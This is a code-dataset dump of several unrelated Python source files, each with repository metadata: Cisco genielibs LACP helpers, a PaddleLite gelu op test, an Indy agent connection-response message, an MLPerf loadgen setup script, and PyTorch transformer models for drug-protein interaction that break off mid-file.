f73261fd8815ad358fea1b0a2e1346d8c7efae13 | 4,929 | py | Python | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/lacp/get.py | CiscoTestAutomation/genielibs | becee8a1a85f4973e00859e3244e2c8fe45a394c | [
"Apache-2.0"
] | 94 | 2018-04-30T20:29:15.000Z | 2022-03-29T13:40:31.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/lacp/get.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 67 | 2018-12-06T21:08:09.000Z | 2022-03-29T18:00:46.000Z | pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/lacp/get.py | patrickboertje/genielibs | 61c37aacf3dd0f499944555e4ff940f92f53dacb | [
"Apache-2.0"
] | 49 | 2018-06-29T18:59:03.000Z | 2022-03-10T02:07:59.000Z | # Python
import logging
# Genie
from genie.metaparser.util.exceptions import SchemaEmptyParserError
log = logging.getLogger(__name__)
def get_lacp_member(device, port_channel, count, member, intf_list, internal=False):
    """ Parse 'show lacp internal/neighbor' output and return the requested member field

        Args:
            device (`obj`): Device object
            port_channel (`str`): Port channel name (case-insensitive, e.g. 'port-channel1')
            count (`int`): Index into intf_list of the interface to match
            member (`str`): Field to extract, one of 'interface', 'port_num',
                'oper_key' or 'partner_id'
            intf_list (`list`): List of member interface names
            internal (`bool`): True = 'show lacp internal', False = 'show lacp neighbor'
        Returns:
            The requested member value, or None if not found.
            'partner_id' is reformatted from dotted notation
            (e.g. '50f7.22b2.f200') to colon notation ('50:f7:22:b2:f2:00').
    """
    if internal:
        out = device.parse("show lacp internal")
    else:
        out = device.parse("show lacp neighbor")

    if not out:
        return None

    port_channel = port_channel.capitalize()
    members = out.get("interfaces", {}).get(port_channel, {}).get("members", {})

    for data in members.values():
        if not data.get(member):
            continue
        if member == "partner_id":
            # Strip the dots and re-group as colon-separated byte pairs:
            # '50f7.22b2.f200' -> '50f722b2f200' -> '50:f7:22:b2:f2:00'
            raw = data[member].replace(".", "")
            return ":".join(raw[i:i + 2] for i in range(0, len(raw), 2))
        elif member == "interface":
            if data[member] == intf_list[count]:
                return data[member]
        else:
            # For any other field, return it only for the interface at
            # position `count` in intf_list
            if data["interface"] == intf_list[count]:
                return data[member]
    return None
def get_lacp_sys_id(device):
    """ Parse 'show lacp sys-id' output and return the system id

        Args:
            device (`obj`): Device object
        Returns:
            System id in colon notation, e.g. '70:d3:79:84:aa:80'
    """
    # Example output: '32768, 70d3.7984.aa80'.
    # Take the MAC after the comma instead of assuming a fixed-width
    # priority field (the original hard-coded offset broke for priorities
    # that are not exactly 5 digits).
    res = device.execute("show lacp sys-id")
    mac = res.split(",")[-1].strip().replace(".", "")
    # Re-group as colon-separated byte pairs: '70d37984aa80' -> '70:d3:79:84:aa:80'
    return ":".join(mac[i:i + 2] for i in range(0, len(mac), 2))
def get_lacp_intf_count(device, port_channel):
    """ Parse 'show lacp internal' output and return the number of member interfaces

        Args:
            device (`obj`): Device object
            port_channel (`str`): Port channel name (case-insensitive)
        Returns:
            Number of member interfaces (0 when the parser output is empty)
    """
    try:
        out = device.parse("show lacp internal")
    except SchemaEmptyParserError:
        return 0

    if not out:
        return 0

    port_channel = port_channel.capitalize()
    members = out.get("interfaces", {}).get(port_channel, {}).get("members", {})
    # Count only members that carry data, matching the original truthiness check
    return sum(1 for data in members.values() if data)
def get_lacp_intf_list(device, port_channel):
    """ Parse 'show lacp internal' output and return the member interface list

        Args:
            device (`obj`): Device object
            port_channel (`str`): Port channel name (case-insensitive)
        Returns:
            List of member interface names ([] when the parser output is empty)
    """
    try:
        out = device.parse("show lacp internal")
    except SchemaEmptyParserError:
        return []

    if not out:
        return []

    port_channel = port_channel.capitalize()
    members = out.get("interfaces", {}).get(port_channel, {}).get("members", {})
    # Collect the 'interface' field of every member that carries data,
    # matching the original truthiness check
    return [data["interface"] for data in members.values() if data]
| 37.625954 | 109 | 0.571313 |
import logging
from genie.metaparser.util.exceptions import SchemaEmptyParserError
log = logging.getLogger(__name__)
def get_lacp_member(device, port_channel, count, member, intf_list, internal=False):
if (internal == True):
out = device.parse("show lacp internal")
else:
out = device.parse("show lacp neighbor")
port_channel = port_channel.capitalize()
if (
out
and "interfaces" in out
and port_channel in out["interfaces"]
and "members" in out["interfaces"][port_channel]
):
for intf in out["interfaces"][port_channel]["members"]:
if out["interfaces"][port_channel]["members"][intf][member]:
if member == "partner_id":
res = out["interfaces"][port_channel]["members"][intf][member]
res1 = ''.join([res[i] for i in range(len(res)) if res[i] != '.'])
res2 = ':'.join(res1[i:i + 2] for i in range(0, len(res1), 2))
return res2
elif member == "interface":
ifs = out["interfaces"][port_channel]["members"][intf][member]
if ifs == intf_list[count]:
return ifs
else:
temp = "interface"
ifs = out["interfaces"][port_channel]["members"][intf][temp]
if ifs == intf_list[count]:
return out["interfaces"][port_channel]["members"][intf][member]
return None
def get_lacp_sys_id(device):
res = device.execute("show lacp sys-id")
res = ''.join([res[i] for i in range(len(res)) if i > 6])
res1 = ''.join([res[i] for i in range(len(res)) if res[i] != '.'])
sys_id = ':'.join(res1[i:i + 2] for i in range(0, len(res1), 2))
return sys_id
def get_lacp_intf_count(device, port_channel):
try:
out = device.parse("show lacp internal")
except SchemaEmptyParserError:
return 0
port_channel = port_channel.capitalize()
count = 0
if (
out
and "interfaces" in out
and port_channel in out["interfaces"]
and "members" in out["interfaces"][port_channel]
):
for intf in out["interfaces"][port_channel]["members"]:
if out["interfaces"][port_channel]["members"][intf]:
temp = "interface"
ifs = out["interfaces"][port_channel]["members"][intf][temp]
count = count + 1
return count
def get_lacp_intf_list(device, port_channel):
try:
out = device.parse("show lacp internal")
except SchemaEmptyParserError:
return []
port_channel = port_channel.capitalize()
intf_list = []
if (
out
and "interfaces" in out
and port_channel in out["interfaces"]
and "members" in out["interfaces"][port_channel]
):
for intf in out["interfaces"][port_channel]["members"]:
if out["interfaces"][port_channel]["members"][intf]:
temp = "interface"
ifs = out["interfaces"][port_channel]["members"][intf][temp]
intf_list.append(ifs)
return intf_list
| true | true |
f7326241d185da508ae499d8b06d8fa4296a28b9 | 1,626 | py | Python | lite/tests/unittest_py/op/backends/x86/test_gelu_op.py | laiou/Paddle-Lite | a99080a48186ec7df546d77d39db58d84d1dda3e | [
"Apache-2.0"
] | null | null | null | lite/tests/unittest_py/op/backends/x86/test_gelu_op.py | laiou/Paddle-Lite | a99080a48186ec7df546d77d39db58d84d1dda3e | [
"Apache-2.0"
] | null | null | null | lite/tests/unittest_py/op/backends/x86/test_gelu_op.py | laiou/Paddle-Lite | a99080a48186ec7df546d77d39db58d84d1dda3e | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('../../common')
sys.path.append('../../../')
import test_gelu_op_base
from auto_scan_test import AutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume
class TestGeluOp(AutoScanTest):
    """Auto-scan test for the gelu op on the X86 backend (FP32 / NCHW)."""

    def is_program_valid(self, program_config: ProgramConfig) -> bool:
        # Every sampled program is considered valid for this op.
        return True

    def sample_program_configs(self, draw):
        # Delegate program sampling to the shared gelu base module.
        return test_gelu_op_base.sample_program_configs(draw)

    def sample_predictor_configs(self):
        # Run on X86 with FP32 precision and NCHW layout. (1e-5, 1e-5) are the
        # comparison tolerances — presumably (atol, rtol); confirm in AutoScanTest.
        config = CxxConfig()
        config.set_valid_places({Place(TargetType.X86, PrecisionType.FP32, DataLayoutType.NCHW)})
        yield config, ["gelu"], (1e-5, 1e-5)

    def add_ignore_pass_case(self):
        # No known failing cases to ignore for this op.
        pass

    def test(self, *args, **kwargs):
        # Run the auto-scan harness without quantization, capped at 25 examples.
        self.run_and_statis(quant=False, max_examples=25)
if __name__ == "__main__":
unittest.main()
| 33.875 | 125 | 0.741697 |
import sys
sys.path.append('../../common')
sys.path.append('../../../')
import test_gelu_op_base
from auto_scan_test import AutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume
class TestGeluOp(AutoScanTest):
def is_program_valid(self, program_config: ProgramConfig) -> bool:
return True
def sample_program_configs(self, draw):
return test_gelu_op_base.sample_program_configs(draw)
def sample_predictor_configs(self):
config = CxxConfig()
config.set_valid_places({Place(TargetType.X86, PrecisionType.FP32, DataLayoutType.NCHW)})
yield config, ["gelu"], (1e-5, 1e-5)
def add_ignore_pass_case(self):
pass
def test(self, *args, **kwargs):
self.run_and_statis(quant=False, max_examples=25)
if __name__ == "__main__":
unittest.main()
| true | true |
f7326364052f70b968fe2f687a12024f1f20264d | 1,057 | py | Python | agent/indy_catalyst_agent/messaging/connections/messages/connection_response.py | mikelodder7/indy-catalyst | 5e80d8d6764144303b7ef1851aee32291bcb2d98 | [
"Apache-2.0"
] | null | null | null | agent/indy_catalyst_agent/messaging/connections/messages/connection_response.py | mikelodder7/indy-catalyst | 5e80d8d6764144303b7ef1851aee32291bcb2d98 | [
"Apache-2.0"
] | null | null | null | agent/indy_catalyst_agent/messaging/connections/messages/connection_response.py | mikelodder7/indy-catalyst | 5e80d8d6764144303b7ef1851aee32291bcb2d98 | [
"Apache-2.0"
] | null | null | null | """
Represents a connection response message
"""
from marshmallow import fields
from ...agent_message import AgentMessage, AgentMessageSchema
from ..message_types import CONNECTION_RESPONSE
from ....models.connection_detail import ConnectionDetail, ConnectionDetailSchema
HANDLER_CLASS = (
"indy_catalyst_agent.messaging.connections.handlers."
+ "connection_response_handler.ConnectionResponseHandler"
)
class ConnectionResponse(AgentMessage):
    """Agent message representing a connection response."""

    class Meta:
        """ConnectionResponse metadata: handler, schema, and message type."""

        handler_class = HANDLER_CLASS
        schema_class = "ConnectionResponseSchema"
        message_type = CONNECTION_RESPONSE

    def __init__(self, *, connection: ConnectionDetail = None, **kwargs):
        """Initialize a connection response message.

        Args:
            connection: The connection detail payload for this response
        """
        super(ConnectionResponse, self).__init__(**kwargs)
        self.connection = connection
class ConnectionResponseSchema(AgentMessageSchema):
    """Marshmallow schema for (de)serializing ConnectionResponse messages."""

    class Meta:
        """ConnectionResponseSchema metadata; 'connection' is a signed field."""

        model_class = ConnectionResponse
        signed_fields = ("connection",)

    connection = fields.Nested(ConnectionDetailSchema, required=True)
| 25.166667 | 81 | 0.717124 |
from marshmallow import fields
from ...agent_message import AgentMessage, AgentMessageSchema
from ..message_types import CONNECTION_RESPONSE
from ....models.connection_detail import ConnectionDetail, ConnectionDetailSchema
HANDLER_CLASS = (
"indy_catalyst_agent.messaging.connections.handlers."
+ "connection_response_handler.ConnectionResponseHandler"
)
class ConnectionResponse(AgentMessage):
class Meta:
handler_class = HANDLER_CLASS
schema_class = "ConnectionResponseSchema"
message_type = CONNECTION_RESPONSE
def __init__(self, *, connection: ConnectionDetail = None, **kwargs):
super(ConnectionResponse, self).__init__(**kwargs)
self.connection = connection
class ConnectionResponseSchema(AgentMessageSchema):
class Meta:
model_class = ConnectionResponse
signed_fields = ("connection",)
connection = fields.Nested(ConnectionDetailSchema, required=True)
| true | true |
f73263c4c1df5dfb8107b488aaa76084d7b77bb6 | 1,842 | py | Python | loadgen/setup.py | sf-wind/inference | ae7fa59ce55cd68dfd474149df417557a69704a9 | [
"Apache-2.0"
] | null | null | null | loadgen/setup.py | sf-wind/inference | ae7fa59ce55cd68dfd474149df417557a69704a9 | [
"Apache-2.0"
] | null | null | null | loadgen/setup.py | sf-wind/inference | ae7fa59ce55cd68dfd474149df417557a69704a9 | [
"Apache-2.0"
] | null | null | null | """MLPerf Inference LoadGen python bindings.
Creates a module that python can import.
All source files are compiled by python's C++ toolchain without depending
on a loadgen lib.
This setup.py can be used stand-alone, without the use of an external
build system. This will polute your source tree with output files
and binaries. Use one of the gn build targets instead if you want
to avoid poluting the source tree.
"""
from setuptools import setup, Extension
from version_generator import generate_loadgen_version_definitions

# Generate the version-definition source before building so the extension can
# report its loadgen version at runtime.
generated_version_source_filename = "generated/version.cc"
generate_loadgen_version_definitions(generated_version_source_filename)

# Headers that form the public loadgen API.
public_headers = [
  "loadgen.h",
  "query_sample.h",
  "query_sample_library.h",
  "system_under_test.h",
  "test_settings.h",
]

# Internal headers used only by the library implementation.
lib_headers = [
  "logging.h",
  "test_settings_internal.h",
  "trace_generator.h",
  "utils.h",
  "version.h",
]

lib_sources = [
  "loadgen.cc",
  "logging.cc",
]

mlperf_loadgen_headers = public_headers + lib_headers
mlperf_loadgen_sources_no_gen = lib_sources
mlperf_loadgen_sources = \
    mlperf_loadgen_sources_no_gen + [generated_version_source_filename]

# NOTE(review): every entry here except bindings/python_api.cc also appears in
# mlperf_loadgen_sources, so loadgen.cc, logging.cc and generated/version.cc
# are listed twice in the Extension's sources below — confirm whether the
# duplication is intentional.
sources = [
  "bindings/python_api.cc",
  "generated/version.cc",
  "loadgen.cc",
  "logging.cc",
]

mlperf_loadgen_module = Extension('mlperf_loadgen',
                    define_macros = [('MAJOR_VERSION', '0'),
                                     ('MINOR_VERSION', '5')],
                    include_dirs = [ '.', '../third_party/pybind/include' ],
                    sources = mlperf_loadgen_sources + sources,
                    depends = mlperf_loadgen_headers)

setup (name = 'mlperf_loadgen',
       version = '0.5a0',
       description = 'MLPerf Inference LoadGen python bindings',
       url = 'https://mlperf.org',
       ext_modules = [mlperf_loadgen_module])
| 28.78125 | 76 | 0.698697 |
from setuptools import setup, Extension
from version_generator import generate_loadgen_version_definitions
generated_version_source_filename = "generated/version.cc"
generate_loadgen_version_definitions(generated_version_source_filename)
public_headers = [
"loadgen.h",
"query_sample.h",
"query_sample_library.h",
"system_under_test.h",
"test_settings.h",
]
lib_headers = [
"logging.h",
"test_settings_internal.h",
"trace_generator.h",
"utils.h",
"version.h",
]
lib_sources = [
"loadgen.cc",
"logging.cc",
]
mlperf_loadgen_headers = public_headers + lib_headers
mlperf_loadgen_sources_no_gen = lib_sources
mlperf_loadgen_sources = \
mlperf_loadgen_sources_no_gen + [generated_version_source_filename]
sources = [
"bindings/python_api.cc",
"generated/version.cc",
"loadgen.cc",
"logging.cc",
]
mlperf_loadgen_module = Extension('mlperf_loadgen',
define_macros = [('MAJOR_VERSION', '0'),
('MINOR_VERSION', '5')],
include_dirs = [ '.', '../third_party/pybind/include' ],
sources = mlperf_loadgen_sources + sources,
depends = mlperf_loadgen_headers)
setup (name = 'mlperf_loadgen',
version = '0.5a0',
description = 'MLPerf Inference LoadGen python bindings',
url = 'https://mlperf.org',
ext_modules = [mlperf_loadgen_module])
| true | true |
f732658d5a149ab114e15ead4d028cafb022c2a4 | 18,700 | py | Python | models.py | zedian/esm | 9d2b50cd96753e8a703ca810e875c9e887047ed9 | [
"MIT"
] | null | null | null | models.py | zedian/esm | 9d2b50cd96753e8a703ca810e875c9e887047ed9 | [
"MIT"
] | null | null | null | models.py | zedian/esm | 9d2b50cd96753e8a703ca810e875c9e887047ed9 | [
"MIT"
] | null | null | null | from __future__ import print_function
import torch
from torch import nn
import torch.utils.data as Data
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import collections
import math
import copy
torch.manual_seed(1)
np.random.seed(1)
class BIN_Interaction_Flat(nn.Sequential):
    '''
    Interaction Network with 2D interaction map.

    Two independent transformer encoders embed the drug and protein token
    sequences; their pairwise (outer-product style) interaction map is summed
    over the embedding channel, passed through a small CNN and decoded to a
    single interaction score per example.
    '''
    def __init__(self, **config):
        super(BIN_Interaction_Flat, self).__init__()
        self.max_d = config['max_drug_seq']
        self.max_p = config['max_protein_seq']
        self.emb_size = config['emb_size']
        self.dropout_rate = config['dropout_rate']

        # densenet-related settings (kept for config compatibility; no dense
        # net is instantiated here)
        self.scale_down_ratio = config['scale_down_ratio']
        self.growth_rate = config['growth_rate']
        self.transition_rate = config['transition_rate']
        self.num_dense_blocks = config['num_dense_blocks']
        self.kernal_dense_size = config['kernal_dense_size']
        self.batch_size = config['batch_size']
        self.input_dim_drug = config['input_dim_drug']
        self.input_dim_target = config['input_dim_target']
        self.gpus = torch.cuda.device_count()
        self.n_layer = 2

        # encoder settings
        self.hidden_size = config['emb_size']
        self.intermediate_size = config['intermediate_size']
        self.num_attention_heads = config['num_attention_heads']
        self.attention_probs_dropout_prob = config['attention_probs_dropout_prob']
        self.hidden_dropout_prob = config['hidden_dropout_prob']
        self.flatten_dim = config['flat_dim']

        # specialized embedding with positional one
        self.demb = Embeddings(self.input_dim_drug, self.emb_size, self.max_d, self.dropout_rate)
        self.pemb = Embeddings(self.input_dim_target, self.emb_size, self.max_p, self.dropout_rate)

        self.d_encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_probs_dropout_prob, self.hidden_dropout_prob)
        self.p_encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_probs_dropout_prob, self.hidden_dropout_prob)

        self.icnn = nn.Conv2d(1, 3, 3, padding = 0)

        self.decoder = nn.Sequential(
            nn.Linear(self.flatten_dim, 512),
            nn.ReLU(True),
            nn.BatchNorm1d(512),
            nn.Linear(512, 64),
            nn.ReLU(True),
            nn.BatchNorm1d(64),
            nn.Linear(64, 32),
            nn.ReLU(True),
            # output layer
            nn.Linear(32, 1)
        )

    def forward(self, d, p, d_mask, p_mask):
        """Score a batch of drug/protein pairs.

        Args:
            d: (batch, max_d) drug token ids
            p: (batch, max_p) protein token ids
            d_mask, p_mask: (batch, seq) masks, 1 for tokens and 0 for padding
        Returns:
            (batch, 1) interaction scores
        """
        # Expand padding masks to additive attention masks
        # (0 where attended, -10000 where masked out).
        ex_d_mask = d_mask.unsqueeze(1).unsqueeze(2)
        ex_p_mask = p_mask.unsqueeze(1).unsqueeze(2)
        ex_d_mask = (1.0 - ex_d_mask) * -10000.0
        ex_p_mask = (1.0 - ex_p_mask) * -10000.0

        d_emb = self.demb(d)  # batch_size x seq_length x embed_size
        p_emb = self.pemb(p)

        # Last-layer hidden states of each encoder.
        d_encoded_layers = self.d_encoder(d_emb.float(), ex_d_mask.float())
        p_encoded_layers = self.p_encoder(p_emb.float(), ex_p_mask.float())

        # Broadcast to (batch, max_d, max_p, emb) and multiply element-wise to
        # build the pairwise interaction tensor.
        d_aug = torch.unsqueeze(d_encoded_layers, 2).repeat(1, 1, self.max_p, 1)
        p_aug = torch.unsqueeze(p_encoded_layers, 1).repeat(1, self.max_d, 1, 1)
        i = d_aug * p_aug

        # NOTE(review): this view reinterprets (max_d, max_p, emb) memory as
        # (emb', max_d, max_p) without a permute — confirm this layout is
        # intended before relying on the channel semantics.
        i_v = i.view(self.batch_size, -1, self.max_d, self.max_p)
        i_v = torch.sum(i_v, dim = 1)     # collapse the channel dimension
        i_v = torch.unsqueeze(i_v, 1)     # (batch, 1, max_d, max_p) for the CNN
        i_v = F.dropout(i_v, p = self.dropout_rate)

        f = self.icnn(i_v)
        f = f.view(self.batch_size, -1)
        score = self.decoder(f)
        return score
class Single_Transformer_Embedding(nn.Sequential):
    '''
    Transformer encoder over a single token sequence, decoded to per-token
    vocabulary logits.
    '''
    def __init__(self, **config):
        super(Single_Transformer_Embedding, self).__init__()
        self.max_len = config["max_len"]
        self.emb_size = config["emb_size"]
        self.dropout_rate = config["dropout_rate"]
        self.batch_size = config["batch_size"]
        self.input_dim = config["input_dim"]
        self.gpus = torch.cuda.device_count()
        self.n_layer = 2

        # encoder settings
        self.hidden_size = config["emb_size"]
        self.intermediate_size = config["intermediate_size"]
        self.num_attention_heads = config["num_attention_heads"]
        self.attention_dropout = config["attention_probs_dropout_prob"]
        self.hidden_dropout = config["hidden_dropout_prob"]
        self.vocab_size = config['vocab_size']
        self.flatten_dim = config["flat_dim"]

        # token embedding with learned positional embedding
        self.emb = Embeddings(self.input_dim, self.emb_size, self.max_len, self.dropout_rate)
        self.encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_dropout, self.hidden_dropout)
        self.decoder = nn.Sequential(
            nn.Linear(self.hidden_size, self.vocab_size)
        )

    def forward(self, x):
        """Embed token ids x (batch, seq) and return per-token vocab logits.

        No padding mask is applied: a zero additive mask attends everywhere.
        """
        emb = self.emb(x)  # batch_size x seq_length x embed_size
        encoded_layers = self.encoder(emb.float(), 0.)
        return self.decoder(encoded_layers)
class BIN_Transformer_Single(nn.Sequential):
    '''
    Simple transformer encoder over a single (drug + protein concatenated)
    sequence, flattened and decoded to one interaction score per example.
    '''
    def __init__(self, **config):
        super(BIN_Transformer_Single, self).__init__()
        self.max_d = config['max_drug_seq']
        self.max_p = config['max_protein_seq']
        self.max_len = config['max_len']  # drug and protein concatenated
        self.emb_size = config['emb_size']
        self.dropout_rate = config['dropout_rate']

        # densenet-related settings (kept for config compatibility; no dense
        # net is instantiated here)
        self.scale_down_ratio = config['scale_down_ratio']
        self.growth_rate = config['growth_rate']
        self.transition_rate = config['transition_rate']
        self.num_dense_blocks = config['num_dense_blocks']
        self.kernal_dense_size = config['kernal_dense_size']
        self.batch_size = config['batch_size']
        self.input_dim = config['input_dim']
        self.gpus = torch.cuda.device_count()
        self.n_layer = 2

        # encoder settings
        self.hidden_size = config['emb_size']
        self.intermediate_size = config['intermediate_size']
        self.num_attention_heads = config['num_attention_heads']
        self.attention_probs_dropout_prob = config['attention_probs_dropout_prob']
        self.hidden_dropout_prob = config['hidden_dropout_prob']
        self.vocab_size = config['vocab_size']
        self.flatten_dim = config['flat_dim']

        # token embedding with learned positional embedding
        self.emb = Embeddings(self.input_dim, self.emb_size, self.max_len, self.dropout_rate)
        self.encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_probs_dropout_prob, self.hidden_dropout_prob)
        self.decoder = nn.Sequential(
            nn.Linear(self.flatten_dim, 512),
            nn.ReLU(True),
            nn.BatchNorm1d(512),
            nn.Linear(512, 64),
            nn.ReLU(True),
            nn.BatchNorm1d(64),
            nn.Linear(64, 32),
            nn.ReLU(True),
            # output layer
            nn.Linear(32, 1)
        )

    def forward(self, x, mask):
        """Encode token ids x (batch, max_len) with a padding mask and return
        a (batch, 1) interaction score.
        """
        # Expand the padding mask to an additive attention mask
        # (0 where attended, -10000 where masked out).
        ex_mask = mask.unsqueeze(1).unsqueeze(2)
        ex_mask = (1.0 - ex_mask) * -10000.0

        emb = self.emb(x)  # batch_size x seq_length x embed_size
        encoded_layers = self.encoder(emb.float(), ex_mask.float())

        # Flatten all token representations and decode to a single score.
        encoded_layers = encoded_layers.view(self.batch_size, -1)
        return self.decoder(encoded_layers)
# help classes
class LayerNorm(nn.Module):
    """Layer normalization over the last dimension with learnable
    per-feature scale (gamma) and shift (beta)."""

    def __init__(self, hidden_size, variance_epsilon=1e-12):
        super(LayerNorm, self).__init__()
        self.gamma = nn.Parameter(torch.ones(hidden_size))
        self.beta = nn.Parameter(torch.zeros(hidden_size))
        self.variance_epsilon = variance_epsilon

    def forward(self, x):
        mean = x.mean(-1, keepdim=True)
        centered = x - mean
        variance = centered.pow(2).mean(-1, keepdim=True)
        normalized = centered / torch.sqrt(variance + self.variance_epsilon)
        return self.gamma * normalized + self.beta
class Embeddings(nn.Module):
    """Token embeddings plus learned position embeddings, followed by
    LayerNorm and dropout."""

    def __init__(self, vocab_size, hidden_size, max_position_size, dropout_rate):
        super(Embeddings, self).__init__()
        self.word_embeddings = nn.Embedding(vocab_size, hidden_size)
        self.position_embeddings = nn.Embedding(max_position_size, hidden_size)
        self.LayerNorm = LayerNorm(hidden_size)
        self.dropout = nn.Dropout(dropout_rate)

    def forward(self, input_ids):
        """Return normalized (word + position) embeddings for input_ids (batch, seq)."""
        positions = torch.arange(
            input_ids.size(1), dtype=torch.long, device=input_ids.device
        )
        positions = positions.unsqueeze(0).expand_as(input_ids)
        combined = self.word_embeddings(input_ids) + self.position_embeddings(positions)
        return self.dropout(self.LayerNorm(combined))
class SelfAttention(nn.Module):
    """Multi-head scaled dot-product self-attention with an additive mask."""

    def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob):
        super(SelfAttention, self).__init__()
        if hidden_size % num_attention_heads != 0:
            raise ValueError(
                "The hidden size (%d) is not a multiple of the number of attention "
                "heads (%d)" % (hidden_size, num_attention_heads))
        self.num_attention_heads = num_attention_heads
        self.attention_head_size = int(hidden_size / num_attention_heads)
        self.all_head_size = self.num_attention_heads * self.attention_head_size

        self.query = nn.Linear(hidden_size, self.all_head_size)
        self.key = nn.Linear(hidden_size, self.all_head_size)
        self.value = nn.Linear(hidden_size, self.all_head_size)

        self.dropout = nn.Dropout(attention_probs_dropout_prob)

    def transpose_for_scores(self, x):
        """Reshape (batch, seq, all_head) -> (batch, heads, seq, head_size)."""
        split_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
        return x.view(*split_shape).permute(0, 2, 1, 3)

    def forward(self, hidden_states, attention_mask):
        q = self.transpose_for_scores(self.query(hidden_states))
        k = self.transpose_for_scores(self.key(hidden_states))
        v = self.transpose_for_scores(self.value(hidden_states))

        # Scaled dot-product scores with the additive mask folded in.
        scores = torch.matmul(q, k.transpose(-1, -2))
        scores = scores / math.sqrt(self.attention_head_size) + attention_mask

        # Dropout on attention probabilities drops whole tokens to attend to,
        # as in the original Transformer.
        probs = self.dropout(nn.Softmax(dim=-1)(scores))

        context = torch.matmul(probs, v).permute(0, 2, 1, 3).contiguous()
        merged_shape = context.size()[:-2] + (self.all_head_size,)
        return context.view(*merged_shape)
class SelfOutput(nn.Module):
    """Projects attention output, applies dropout, and adds a residual
    connection followed by LayerNorm."""

    def __init__(self, hidden_size, hidden_dropout_prob):
        super(SelfOutput, self).__init__()
        self.dense = nn.Linear(hidden_size, hidden_size)
        self.LayerNorm = LayerNorm(hidden_size)
        self.dropout = nn.Dropout(hidden_dropout_prob)

    def forward(self, hidden_states, input_tensor):
        projected = self.dropout(self.dense(hidden_states))
        return self.LayerNorm(projected + input_tensor)
class Attention(nn.Module):
    """Self-attention followed by its output projection / residual block."""

    def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
        super(Attention, self).__init__()
        self.self = SelfAttention(hidden_size, num_attention_heads, attention_probs_dropout_prob)
        self.output = SelfOutput(hidden_size, hidden_dropout_prob)

    def forward(self, input_tensor, attention_mask):
        return self.output(self.self(input_tensor, attention_mask), input_tensor)
class Intermediate(nn.Module):
    """Position-wise feed-forward expansion with ReLU activation."""

    def __init__(self, hidden_size, intermediate_size):
        super(Intermediate, self).__init__()
        self.dense = nn.Linear(hidden_size, intermediate_size)

    def forward(self, hidden_states):
        return F.relu(self.dense(hidden_states))
class Output(nn.Module):
    """Projects the feed-forward output back to hidden size, with dropout,
    residual connection, and LayerNorm."""

    def __init__(self, intermediate_size, hidden_size, hidden_dropout_prob):
        super(Output, self).__init__()
        self.dense = nn.Linear(intermediate_size, hidden_size)
        self.LayerNorm = LayerNorm(hidden_size)
        self.dropout = nn.Dropout(hidden_dropout_prob)

    def forward(self, hidden_states, input_tensor):
        projected = self.dropout(self.dense(hidden_states))
        return self.LayerNorm(projected + input_tensor)
class Encoder(nn.Module):
    """One transformer encoder layer: attention block + feed-forward block."""

    def __init__(self, hidden_size, intermediate_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
        super(Encoder, self).__init__()
        self.attention = Attention(hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob)
        self.intermediate = Intermediate(hidden_size, intermediate_size)
        self.output = Output(intermediate_size, hidden_size, hidden_dropout_prob)

    def forward(self, hidden_states, attention_mask):
        attended = self.attention(hidden_states, attention_mask)
        expanded = self.intermediate(attended)
        return self.output(expanded, attended)
class LinearEncoder(nn.Module):
    """Encoder layer built around a linear-attention multi-head block.

    NOTE(review): LinearMultiHeadAttn is not defined or imported anywhere in
    this file's visible scope — confirm it is provided elsewhere before
    instantiating this class, otherwise __init__ raises NameError.
    """
    def __init__(self, hidden_size, intermediate_size, num_attention_heads, attention_dropout, hidden_dropout):
        super(LinearEncoder, self).__init__()
        # Per-head dimension derived the same way as in SelfAttention.
        attention_head_size = int(hidden_size / num_attention_heads)
        self.attention = LinearMultiHeadAttn(num_attention_heads, hidden_size, attention_head_size, hidden_dropout, attention_dropout)

    def forward(self, hidden_states, attention_mask):
        # No feed-forward sub-block here: attention output is the layer output.
        attention_output = self.attention(hidden_states, attention_mask)
        return attention_output
# class DPFPEncoder(nn.Module):
# def __init__(self, hidden_size, intermediate_size, num_attention_heads, attention_dropout, hidden_dropout):
# super(DPFPEncoder, self).__init__()
# attention_head_size = int(hidden_size / num_attention_heads)
# self.attention = DPFPMultiHeadAttn(num_attention_heads, hidden_size, attention_head_size, hidden_dropout, attention_dropout)
# def forward(self, hidden_states, attention_mask):
# attention_output = self.attention(hidden_states, attention_mask)
# return attention_output
class Encoder_MultipleLayers(nn.Module):
    """Stack of n_layer identical encoder layers built from the given encoder class."""

    def __init__(self, encoder, n_layer, hidden_size, intermediate_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
